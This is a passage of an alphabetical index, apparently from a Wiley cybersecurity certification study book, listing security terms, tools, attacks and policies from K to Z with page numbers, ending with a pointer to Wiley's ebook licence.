knowledge-based authentication, 242
known environment test, 7–8, 17, 24, 25, 31, 190, 195, 200, 201, 204
L
lateral movement, 15, 194
least connection-based load balancing, 85, 239
least privilege, 161, 282
legacy systems, 33–34, 206, 291
legal hold, 280
lighting, as a deterrent, 74, 232
Lightweight Directory Access Protocol (LDAP), 29, 56, 80, 96, 203, 219, 236, 246, 255
Lightweight Extensible Authentication Protocol (LEAP), 104, 237, 251
Linux kernel, 232
Linux privilege, 207
load balancing, 102, 247, 250
locks, 69, 70, 162, 181, 229, 283, 296
log aggregation, 4, 187, 196
logger utility, 273
logging, 199
logic bomb, 2, 9, 10, 14, 16, 18, 19, 22, 27, 28, 186, 190, 191, 194, 195, 196, 199, 201, 202
loop protection, 123, 264
low-power devices, 70–71, 229–230
M
machine learning (ML), 207, 210
macro virus, 9, 17, 190, 195
malware, 8, 26, 27, 186, 189, 190, 191, 194, 195, 196, 201, 212, 237–238, 282
managed security service providers (MSSPs), 227
mandatory access control (MAC), 14, 111, 114, 193, 233, 257, 259, 281, 294
mandatory vacation policy, 161, 162, 283
man-in-the-browser attack, 26, 201
mantrap, 219
mapping networks, 271
masking, 74, 78, 232, 235
MD5, 80, 236, 269
mean time between failures (MTBF), 168, 169, 171, 172, 288, 289, 290
mean time to repair (MTTR), 168, 169, 171, 288, 289, 290
measured boot, 259
media, burning, 236
Media Access Control (MAC), 188
memdump tool, 273
memorandum of understanding (MOU), 162, 176, 179, 183, 283–284, 292, 294, 297
memory exhaustion, 202
memory leaks, 22, 199, 201, 202, 231
Metasploit, 146, 276
MFPs, 222
microcontroller, 214
microservice architectures, 222
Microsoft Office, 277
misconfiguration, 192
mist computing, 74, 232
MITRE ATT&CK framework, 132, 267
mobile application management (MAM), 264
mobile device management (MDM), 82–83, 113, 116, 117, 124, 237, 258, 260, 265, 272, 275
motion activation, 71, 230
motion detection, 69, 228
motion recognition, 58, 221
multifactor authentication, 5, 78, 188, 235, 262
multipartite virus, 27, 201
multiparty risk, 183, 297
Multipurpose Internet Mail Extensions (MIME) sniffing, 82, 237
MX records, 270
N
naming conventions, 224
National Institute of Standards and Technology (NIST), 180–181, 295
National Security Agency (NSA), 150, 174, 278, 291, 297
nation-state actors, 19, 196, 197
natural disasters, 76, 233
Near-Field Communication (NFC), 23, 103, 199, 251
Nessus, 134–135, 146, 269, 276
net user command, 262
netcat command, 137, 270
NetFlow, 134, 269, 271
netstat command, 133, 153, 156, 268, 280, 282
network address translation (NAT), 102, 118, 250, 261
network attached storage (NAS), 46, 62, 213, 223
network flows, 269, 271
network interface cards (NICs), 229
network intrusion detection system (NIDS), 67, 227
network intrusion prevention system (NIPS), 52, 67, 216–217, 227, 249
network load balancers, 77, 234
network location, 213
network taps, 248
Network Time Protocol (NTP), 240, 251
network-based intrusion prevention system (NIPS), 100, 248
New Technology LAN Manager (NTLM), 102, 109, 250, 254
next-generation firewalls (NGFWs), 111–112, 256, 257, 264
NIC teaming, 70, 229
NIST 800-12, 282
NIST 800-14, 282
nmap tool, 133, 268
nondisclosure agreement (NDA), 162, 179, 183, 283, 286, 294, 297
nonintrusive scan, 19, 196
normalization, 56, 219, 226
North American Electric Reliability Corporation (NERC), 46, 212
NULL pointer, 3, 187
NXLog, 150, 156, 278, 282
O
OATH-HOTP, 238
OAuth, 60, 80, 107, 110, 222, 236, 253, 255, 263
object detection, 69, 228
offboarding, 164, 170, 193, 284–285, 289, 297
offsite storage, 224
onboarding, 162, 164, 166, 170, 283, 284–285, 286, 289
One Time Password (OTP), 238
Online Certificate Status Protocol (OCSP), 89, 239, 241
on-path (man-in-the-middle) attack, 25, 26, 28, 201, 202
on-premises cloud computing, 235
on-premises networks, 217
open source firewalls, 265
open source intelligence (OSINT), 4, 16, 29, 31, 32, 187, 189, 195, 203, 205
Open Web Application Security Project (OWASP), 46, 211, 212
OpenID, 56, 60, 100, 107, 109, 110, 219, 222, 248, 253, 254, 255, 263
OpenPGP, 238
OpenSSL, 275
openssl command, 269
OpenVAS scanner, 42, 211
operating system (OS) threats, 114–115, 215, 259
operational security (OPSEC), 29, 203
operational technology (OT), 35–36, 198, 207–208
order of volatility, 273–274
original equipment manufacturer (OEM), 72, 231
out-of-band (OOB) management, 108, 253
over-the-air (OTA), 123, 264
P
packet capture, 4, 187
parking policy, 164, 285
partially known environment test, 195, 201
passive reconnaissance, 29, 189, 203
pass-the-hash attack, 24, 191, 200
Password Authentication Protocol (PAP), 103, 251
password cracker, 275, 278
password hashing, 247
password history, 262
password managers, 248
password spraying, 19, 197
password vaults, 248
passwords
  aging, 263
  complexity of, 258
  storing, 142, 208, 274
patching, 95, 174, 246, 281, 291
pathping, 276
Payment Card Industry Data Security Standard (PCI-DSS), 162, 171, 175, 283, 290, 292
PBKDF2 algorithm, 236
penetration tests, 5, 28, 37, 68, 188, 191, 196, 199, 202, 205, 209, 227–228
pepper, 3, 186
perfect forward secrecy (PFS), 49, 214
permissions
  auditing, 257
  setting, 35, 207
permissions creep, 3, 187
personal identification number (PIN), 241
Personal Information Exchange (PFX), 87–88, 240–241
personally identifiable information (PII), 235, 291
personnel credential policy, 293
-p flag, 267
pharming attacks, 19, 197
phishing, 2, 6, 9, 13, 23, 25, 27, 28, 36, 186, 189, 191, 193, 199, 200, 202, 208, 217
picture passwords, 47, 213
pie charts, 31, 205
ping command, 271
pivot, 8, 190
plain-text password attack, 10, 191
platform as a service (PaaS), 54, 58, 64, 73, 78, 218, 221, 225, 232, 235
playbooks, 142, 154, 274, 276, 281
point-to-multipoint topology, 248
point-to-point topology, 248
policies, 283, 285, 289, 294
polymorphic virus, 198
POP3, 85, 239
port scans, 211, 270
port security, 83, 238, 248
Postgres server, 194
potentially unwanted programs (PUPs), 14, 21, 29, 193, 198, 203
power distribution unit (PDU), 75, 226, 233, 247
PowerShell, 23, 40, 199, 211, 222
predictive analysis, 4, 187, 210
prepending, 20, 33, 37, 197, 206, 209
preproduction environments, 216
preshared key (PSK), 100, 244–245, 248
pretexting, 16, 33, 195, 206
preventive controls, 166, 167, 286, 287
prime factorization algorithms, 50, 215
Privacy Enhanced Mail (PEM) files, 126, 240–241, 266
privacy notices, 184, 296, 297
private cloud, 65, 78, 225, 235
private keys, 48, 49, 214, 247, 280
privilege creep, 80, 236
privilege escalation, 13, 15, 20, 34, 193, 194, 197, 206–207
privilege scan, 195
privileged access management (PAM), 265
production server, 51, 216
proprietary data, 285, 293
proprietary intelligence, 32, 205
protected cable distribution, 77, 234
Protected Extensible Authentication Protocol (PEAP), 94, 237, 245
protocols, 212
provenance, 151, 275, 279
proximity card readers, 75, 233
PRTG, 274
pseudonymization, 171–172, 290
public cloud, 64, 65, 225
public key infrastructure (PKI), 256, 264
public keys, 48, 49, 214, 247
purple teams, 4–5, 22, 30, 188, 199, 204
push notifications, 82–83, 237
Python, 17, 195
Q
qualitative risk assessment, 162, 165, 174–175, 283, 285, 291
quality assurance (QA), 216
quantitative risk assessment, 162, 165, 168, 174–175, 283, 285, 288, 291
quantum computing, 72, 231
quantum cryptography, 215
quantum encryption, 50, 215
quarantine process, 153, 272, 280
Qubits, 215
quick formatting, 148, 277
R
race conditions, 14, 23, 194, 199
radio frequency identifier (RFID), 11, 23, 27, 75, 96, 192, 199, 202, 233, 246
RAID, 55, 56, 71, 218, 219, 230
rainbow tables, 9, 12, 21, 191, 193, 198, 203, 298
ransomware, 22, 199
Raspberry Pi, 48, 214
rate limiting, 246
rebooting, 276
reconnaissance phase, of penetration testing, 37, 209
recovery, 131, 267
recovery point objective (RPO), 169, 289
recovery time objective (RTO), 166, 177, 287, 292
Red Hat, 270
red teams, 4–5, 22, 24, 30, 188, 199, 200, 204
refactoring, 8, 36, 190, 208
registration authority (RA), 239
remote access, 246
Remote Authentication Dial-in User Service (RADIUS), 56, 100, 219, 231, 246, 248
remote registry, 254
remote wipe, 82–83, 237, 252
remote-access Trojan (RAT), 10, 14, 17, 21, 29, 32, 191, 193, 195, 198, 203, 205
replay attack, 25, 29, 201, 203
reputational gains, 210
requests for comments (RFCs), 63, 224
resource constraints, 234
resource policies, 54, 218
resource-based policies, 98, 247
restoration order, 213
retention policies, 138, 271
retina scans, 62, 223
reverse proxy, 112, 114, 125, 127, 257, 266
reverse shell, 205
-R flag, 272
right-to-audit clauses, 280
risk acceptance, 163, 166, 167, 168, 284, 287, 288
risk avoidance, 163, 166, 167, 168, 284, 287, 288
risk heat maps, 174–175, 291
risk mitigation, 163, 166, 167, 168, 182, 284, 287, 288, 297
risk register, 166, 171, 287, 290
risk transfer, 163, 166, 167, 168, 284, 287, 288
robocalling, 28, 202
rogue access point, 3, 11, 186, 192
role-based access control (RBAC), 110, 111, 114, 255, 257, 259
root certificate, 249
root grabbing, 13, 193
Root Guard, 240
rootkit, 2, 9, 10, 13, 14, 19, 22, 27, 186, 190, 191, 193, 194, 196, 199, 201, 202
route command, 268
RSA key, 49, 214
RSH, 16, 195
RTO, 50, 215
RTOS, 61, 223
rule of engagement, for penetration tests, 32, 205
rule-based access control, 255
S
salts, 3, 49, 79, 186, 214, 223, 235
sandboxing, 53, 54, 217, 218, 244
scalability, in cloud computing, 56, 226
scanless tool, 136, 270
scarcity, 5, 16, 188, 194
script kiddies, 6, 18, 33, 189, 196, 205
scripting, 65, 225
scrypt algorithm, 236
secrets management services, 102, 250
secure cookies, 241
secure IMAPs, 247
Secure Lightweight Directory Access Protocol (LDAPS), 115, 259
Secure POP3, 84, 238
Secure Shell (SSH), 43, 86, 97, 98, 195, 212, 238, 240, 247, 253, 278
Secure Sockets Layer (SSL), 31, 67, 204, 220, 227
Secure/Multipurpose Internet Mail Extensions (S/MIME), 84, 238
Security Account Manager (SAM) file, 204
Security Assertion Markup Language (SAML), 56, 60, 80, 102, 116, 219, 222, 236, 250, 253, 255, 260, 263
security audits, 5, 188
Security Enhanced Linux (SELinux), 265
security groups, 117, 261
security guard, 59, 69, 221, 229
security information and event management (SIEM) device, 4, 31, 72, 187–188, 204, 205, 210, 231, 249
security monitoring, 187–188
security orchestration, automation, and response (SOAR), 8, 31, 39, 190, 204, 210
security zones, 90, 242–243
segmentation, 150, 151, 255, 275, 278, 279
segmentation fault, 187
self-encrypting drive (SED), 52, 63, 217, 224
self-signed certificate, 87, 240
sensor appliances, 247
sensors, 272
separation of duties, 166, 169, 179, 286, 288–289, 294
serverless architectures, 58, 221
server-side request forgery (SSRF), 7, 36, 189, 208
service accounts, 251, 293
service level agreement (SLA), 162, 176, 179, 283–284, 286, 292, 294
service organization report (SOC), 39, 210
Service Set Identifiers (SSIDs), 246
session hijacking, 3, 12, 13, 18, 26, 186, 192, 193, 196, 201
session IDs, 211
Session Initiation Protocol (SIP), 239, 270, 278
session persistence, 253
sFlow, 269, 271
SFTP, 195
SHA1 algorithm, 80, 236, 269
shimming, 8, 24, 190, 200
Shiva Password Authentication Protocol (SPAP), 103, 251
short message service (SMS) messages, 69, 217, 228
shoulder surfing, 25, 28, 33, 200, 202, 206
signage, 68, 228
silent patching, 36, 208
Simple Network Management Protocol (SNMP), 98, 120, 126, 247, 252, 263, 266, 274
simulation, 272
simultaneous authentication of equals (SAE), 243
single loss expectancy (SLE), 163, 284, 295
single point of failure (SPOF), 168, 176, 288, 292
Single Sign-On (SSO), 113, 255, 258
site survey, 237
skimmer, 29, 203
smart cards, 68, 69, 227, 229, 238
smishing, 27, 189, 202
SMS pushes, 234
Smurf attack, 25, 200
snapshots, 54, 65, 218, 225
SOC 2 engagement, 294
social engineering, 9, 16, 24, 187, 191, 194, 195, 200, 206
social login, 73, 231
social media influence campaigns, 18, 196
social proof, 194
software
  compiling, 63, 224
  updates for, 202
software as a service (SaaS), 54, 58, 73, 218, 221, 232
software firewall, 103, 251
software-defined networking (SDN), 52, 55, 59, 67, 217, 218, 221, 227
source code, 290
SourceForge, 40, 210
spam, 6, 189
sparse infector virus, 195
spear phishing, 2, 9, 28, 186, 189, 191, 202
SPIM, 3, 187
split horizon DNS, 99, 248
split-tunnel VPNs, 123, 264
spyware, 14, 193, 198
SQL injection, 2, 3, 10, 20, 22, 51, 57, 186, 189, 191, 197, 198, 216, 220, 245, 280
SRTP, 238
SSH File Transfer Protocol (SFTP), 252
staging environments, 51, 216
staging server, 53, 217
stakeholder management, 133, 138, 268, 271
standards, 224
state actors, 18, 196
state laws, 294
stateful inspection firewall, 91, 243
stateful packet inspection (SPI), 91, 243
stateless firewall, 255
Statement of Standards for Attestation Engagements (SSAEs), 290
static codes, 230, 245, 247, 252
storage area network (SAN), 54, 62, 218, 223
stored procedures, 66, 220, 226
storm control, 257
stream ciphers, 192
string injection, 243
strings command, 136, 270
Structured Query Language (SQL), 203
Structured Threat Intelligence Exchange (STIX) protocol, 23, 29, 199, 203
Subject Alternate Name (SAN), 246
subnet mask, 46, 212
subscriber identity module (SIM), 234
subscription services, 241
Supervisory Control and Data Acquisition (SCADA) system, 52, 67, 215, 216–217, 227
supply chain risk, 291
swap files, 34, 206–207, 273
symmetric cryptography, 71, 230
symmetric encryption, 49, 53–54, 214, 218
SYN flood, 33, 206, 243
syslog, 38, 152, 156, 209, 279, 282
system crash file, 274
system dump file, 274
system on a chip (SoC), 224
system restore point, 68, 228
T
tabletop exercises, 267
tagging drives, 279
tail command, 269
tailgating, 23, 39, 199, 210
tape backups, 62, 223
TAXII, 23, 199
TCP handshakes, 4, 187
TCP port 23, 34, 206
TCP port 443, 43, 212
tcpdump, 267
tcpreplay tool, 279
technical controls, 286
Telnet, 16, 43, 195, 206, 212
Terminal Access Controller Access Control System Plus (TACACS+), 116, 260
terminate and stay resident (TSR), 220
test server, 51, 216
testing, 284
theHarvester, 132, 267
third-party code, risks of, 59, 222
third-party credential policies, 295
third-party risks, 210
third-party secure destruction companies, 47, 213
threat actors, 207
threat assessment, 165, 285
threat hunting, 37, 208
threat intelligence, 205
threat maps, 31, 205
threat vectors, 40, 210
thumb drives, 71, 230
time-based one-time password (TOTP), 69, 228
timeboxing, 249–250
timelines, building, 277
time-to-live (TTL), 137–138, 271
TLS inspection, 56, 220
tokenization, 74, 101, 180, 232, 249, 295, 296
tokens, 77, 78, 110, 235, 255
Tor, 30, 203
TOTP, 238
tracert command, 143, 147, 274, 276
traffic, stopping, 244
training, 284, 292
transit gateways, 53, 217
Transport Layer Security (TLS), 67, 86, 90, 103, 104, 105, 108, 193, 227, 239, 240, 242, 251, 252, 253
trends, 281
Trojan horse, 2, 8, 9, 14, 17, 19, 21, 27, 28, 31, 34, 44, 186, 190, 193, 194, 195, 196, 198, 199, 201, 202, 204, 206–207, 212
trusted boot, 259
Trusted Foundry, 31, 46, 205, 212
Trusted Platform Module (TPM), 55, 63, 90, 115, 218, 224, 226, 242, 244, 249, 250, 259, 264
trust/trusting, 24, 200, 210, 244
two-factor authentication, 219
two-person control schemes, 73, 231
typosquatting, 6, 44, 188–189, 212
U
UEFI Secure Boot, 263
unified endpoint management (UEM), 116, 260
Unified Extensible Firmware Interface (UEFI), 115, 254, 259, 261, 263
unified threat management (UTM), 258
uniform resource locator (URL)
  URL filter, 154, 281
  URL redirection, 26, 30, 201, 204
  URL shortening, 204
uninterruptible power supply (UPS), 66, 75, 226, 233, 247
universal endpoint management (UEM), 125, 265
unknown environment test, 7–8, 24, 25, 31, 190, 195, 200, 201, 204
unmanned aerial vehicles (UAVs), 76, 233
urgency, 24, 200
U.S. Department of Agriculture (USDA), 150, 278
USB data blockers, 73, 231
user accounts, 258
user behavior analysis, 187
V
vendor diversity, 46, 213, 237–238
vendor support, 7, 9, 189, 191
version numbering, 67, 227
vertical movement, 15, 194
-v flag, 280
Virtual Desktop Infrastructure (VDI), 94, 222, 245
virtual firewall, 103, 251, 261
virtual IP (VIP), 247
virtual LAN (VLAN), 90, 242–243, 260
virtual machine (VM)
  escape attacks, 57, 58, 66, 220, 226
  forensics, 278
  sprawl, 57, 66, 220, 226
virtual private clouds (VPCs), 217, 261
virtual private network (VPN), 86, 90, 95, 240, 242, 245, 250
virtualization, 220
virus, 28, 202
vishing, 28, 53, 202, 217, 239
Visual Basic for Application (VBA) script, 195
Voice over Internet Protocol (VoIP), 77, 234
Volatility framework, 279
vulnerability assessment, 30, 162, 204, 283
vulnerability scans, 5, 25, 43, 188, 200, 211, 212
W
war dialing, 28, 86, 202, 207, 239
war driving, 16, 195
war flying, 16, 33, 195, 206
war walking, 195, 207
warm site, 50, 68, 215, 228
watering hole attacks, 18, 29, 33, 37, 196, 203, 206, 209
wearables, 228
web application firewall (WAF), 52, 103, 154, 186, 211, 216, 251, 281
web page titles, 270
web proxy, 250, 252
whaling, 9, 22, 37, 191, 199, 209
white teams, 4–5, 22, 30, 35, 188, 199, 204, 207
white-box test, 190, 200, 201, 203, 204
whitelisting, 91, 243
Wi-Fi hotspots, 190
Wi-Fi networks, 252
Wi-Fi Protected Setup (WPS), 2, 88, 186, 192, 241
wildcard certificate, 87, 240
Windows Defender Firewall, 148, 277
WinHex, 274
wireless access point (WAP), 2, 3, 186
wireless network heat maps, 91–92, 243
wireless routers, 204
Wireshark, 136, 137, 138, 152, 270, 271, 278, 279
worms, 13, 23, 28, 29, 193, 199, 202, 203
WPA, 92, 113, 120, 124, 243, 258, 262, 265
X
XaaS, 68, 228
XML injection, 209
Z
zero-day disclosure, 35, 207
zero-day exploits, 20, 191, 197
zero-knowledge test, 190
zero-trust environment, 260
zero-wiping, 271
Zigbee, 61, 223
WILEY END USER LICENSE AGREEMENT
Go to www.wiley.com/go/eula to access Wiley's ebook EULA.